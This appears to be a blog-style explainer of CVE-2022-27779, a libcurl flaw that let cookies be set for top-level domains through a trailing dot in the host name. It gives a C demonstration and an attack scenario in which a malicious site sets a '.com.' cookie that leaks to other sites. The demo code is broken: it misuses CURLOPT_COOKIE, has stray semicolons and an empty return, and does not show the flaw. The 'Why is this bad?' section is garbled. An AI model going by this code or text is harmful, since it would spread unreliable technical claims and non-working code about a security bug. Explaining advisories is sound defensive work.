In 2022, a somewhat obscure yet critical security flaw was disclosed in libcurl, the widely used data transfer library. The bug, tracked as CVE-2022-27779, allowed attackers to set cookies for Top Level Domains (TLDs) using a crafty trick: simply adding a trailing dot in the host name.
This long read breaks down how this bug worked, shows you code snippets, and explains how attackers could exploit it. If you’re building or maintaining software that pulls in curl or libcurl for HTTP requests, this one’s worth your full attention.
Before we jump into the details, let’s get our terms straight
- libcurl: The C library powering tools like curl for transferring data with URLs. Commonly used in everything from bash scripts to big systems.
- Cookies: Small text bits that browsers (and curl) use to remember state, login info, preferences, etc.
- Public Suffix List (PSL): The official list (link) of domain suffixes, used to prevent cookies from being set for TLDs (like .com), making sure cookies stay in their lane.
- Host with trailing dot: A domain name provided as, say, example.com. instead of example.com. Both technically resolve to the same place, but not all tools treat them the same.
The Core Issue
When PSL support in curl is disabled (which is often the case to avoid extra dependencies), libcurl does a simple check to prevent setting cookies for TLDs. But if you end your host name with a ., like example.com., this check is bypassed—letting you set cookies for TLDs!
This can allow an attacker to trick a client into saving cookies for .com. (not just .com). Then, future requests to *other* .com sites with a trailing dot might get these cookies sent unexpectedly, crossing security boundaries.
Demonstration
Let’s walk through a code snippet to show this in action.
#include <stdio.h>
#include <curl/curl.h>
int main(void) {
CURL *curl = curl_easy_init();
if(curl) {
// Intentionally use the trailing dot
curl_easy_setopt(curl, CURLOPT_URL, "http://victim.com./";);
// Simulate a set-cookie header for a top-level domain
curl_easy_setopt(curl, CURLOPT_COOKIE, "SESSIONID=stealme; domain=.com.; path=/");
// Make a request to a _different_ site within .com using a trailing dot
curl_easy_setopt(curl, CURLOPT_URL, "http://another.com./";);
// This will send the SESSIONID cookie to another.com., which is not intended
CURLcode res = curl_easy_perform(curl);
if(res == CURLE_OK)
printf("Request sent!\n");
curl_easy_cleanup(curl);
}
return ;
}
Result:SESSIONID=stealme is sent to every *.com. host you access with a trailing dot, thanks to the cookie’s domain attribute being set to .com.. This shouldn’t be allowed!
Step 1: The Setup
A malicious site (let’s call it evil.example.com) sends a Set-Cookie header setting the domain to .com.:
Set-Cookie: SESSIONID=evil; Domain=.com.; Path=/
Your app, using libcurl, pulls in this cookie if it doesn’t have PSL enabled and the domain you fetched had a trailing dot in the host.
Step 2: The Leak
Later, your app makes a request to bank.com. (note the trailing dot!). To libcurl, this matches the previously set cookie for .com., so it automatically sends SESSIONID=evil with the request. Now, your SESSIONID cookie is presented at an unrelated .com site—a cookie leak!
Why is this bad?
PSL support is enabled (rare due to extra dependencies)
- Hostnames are strictly validated/normalized without dots
Hosts payload at attacksite.com.
- Sends Set-Cookie: user=1337; Domain=.com.; Path=/
Later, downloads from bank.com. (with trailing dot in hostname)
How to Fix and Protect Yourself
The official curl advisory recommends upgrading to curl 7.83.1 or newer, which has a proper fix.
Reference:
- curl security advisory
- libcurl changelog
Conclusion
CVE-2022-27779 highlights how small, quirky parts of HTTP standards—like dots at the end of a domain—can break cookie security. If your applications use libcurl or curl and support cookies, check your version, settings, and how domains are handled. This bug is a good reminder: Trust no unchecked input, and always keep up with security advisories!
For more technical background
- Official curl CVE-2022-27779 page
- Public Suffix List
- curl/libcurl changelog
Timeline
Published on: 06/02/2022 14:15:00 UTC
Last modified on: 06/22/2022 13:48:00 UTC